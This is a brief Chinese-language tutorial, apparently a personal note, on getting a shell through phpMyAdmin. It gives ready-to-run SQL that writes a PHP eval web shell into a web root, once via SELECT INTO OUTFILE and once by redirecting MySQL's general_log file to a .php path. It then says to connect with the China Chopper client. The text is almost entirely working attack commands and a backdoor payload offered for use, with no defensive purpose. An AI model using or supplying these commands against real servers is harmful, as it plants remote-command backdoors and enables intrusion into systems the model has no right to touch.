phpmyadmin getshell

phpmyadmin getshell

参考链接 https://xz.aliyun.com/t/3283#toc-8

1.直接写webshell

1.查看 secure_file_priv

SHOW VARIABLES LIKE "secure_file_priv";

当你尝试执行select into outfile时会爆出如图的错误：（没有写入权限）

2.得到绝对路径直接写shell

select load_file('C:/wamp64/www/ma.php')
select '<?php eval($_POST[cmd]); ?>' into outfile 'C:/wamp64/www/ma.php';

2.日志写shell

mysql5.0版本以上会创建日志文件，可以通过修改日志的全局变量getshell。

检测全局变量(general_log、general_log file)

• 1.general log 指的是日志保存状态，一共有两个值（ON/OFF）ON代表开启 OFF代表关闭。
• 2.general log file 指的是日志的保存路径。

        SHOW VARIABLES LIKE 'general%'

set global general_log = "ON";                        日志功能开启
set global general_log_file='C:/wamp64/www/ma.php';    指定保存的日志位置
select '<?php eval($_POST[cmd]);?>';                    phpmyadmin执行查询语句，最后菜刀直接连接即可